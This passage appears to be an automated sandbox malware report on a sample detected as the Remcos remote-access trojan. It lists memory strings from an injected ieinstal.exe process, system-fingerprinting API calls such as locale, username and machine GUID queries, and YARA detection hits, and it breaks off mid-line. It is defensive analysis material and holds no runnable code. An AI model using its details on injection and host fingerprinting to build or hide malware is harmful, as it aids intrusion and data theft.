Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|3936625|cmd|4313765
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|936922|cmd|323781
Source: ieinstal.exe, 0000000C.00000002.1501793989.0000000000940000.00000004.00000040.sdmpBinary or memory string: art]@L0|cmd|Program Manager|cmd|3936828|cmd|4373859
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Managercmd|937172
Source: ieinstal.exe, 0000000C.00000002.1502815151.00000000031D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: ieinstal.exe, 0000000C.00000002.1502815151.00000000031D0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|3937078
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|936656|cmd|
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|T
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|3937500cmd||
Source: ieinstal.exe, 0000000C.00000002.1502815151.00000000031D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Managercmd|3937360|cmd|
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: Program Managerr
Source: ieinstal.exe, 0000000C.00000002.1504346215.000000000518F000.00000004.00000001.sdmpBinary or memory string: 0|cmd|Program Manager|cmd|3937343cmd|4333781:

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\Dprg\Dprgest.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_00404440
Source: C:\Users\user\Dprg\Dprgest.exeCode function: GetLocaleInfoA,GetACP,10_2_00407820
Source: C:\Users\user\Dprg\Dprgest.exeCode function: GetLocaleInfoA,10_2_00404824
Source: C:\Users\user\Dprg\Dprgest.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_0040454B
Source: C:\Users\user\Dprg\Dprgest.exeCode function: GetLocaleInfoA,10_2_0040667C
Source: C:\Users\user\Dprg\Dprgest.exeCode function: GetLocaleInfoA,10_2_004066C8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,12_2_00409EEE
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00411F49 cpuid 12_2_00411F49
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00402570 GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,CreateThread,12_2_00402570
Contains functionality to query the account / user nameShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00411C0C GetComputerNameExW,GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00411C0C
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Dprg\Dprgest.exeCode function: 10_2_004048ED GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,10_2_004048ED
Queries the cryptographic machine GUIDShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Remcos RATShow sources
Source: Yara matchFile source: 0000000C.00000002.1501343560.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1155859382.0000000004488000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1156091157.00000000044E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1136853129.00000000047AF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1187525190.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1136736873.000000000478F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1187354967.0000000002BD8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000013.00000002.1180206351.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000B.00000002.1154726016.0000000004250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1186754617.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Read Me.exe PID: 3156, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 5756, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Dprgees.exe PID: 4032, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Dprgees.exe PID: 5088, type: MEMORY
Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 5692, type: MEMORY
Source: Yara matchFile source: 11.2.Dprgees.exe.44e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 11.2.Dprgees.exe.44e0000.5.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.Dprgees.exe.2c20000.5.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.Dprgees.exe.2c20000.5.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 19.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 12.2.iein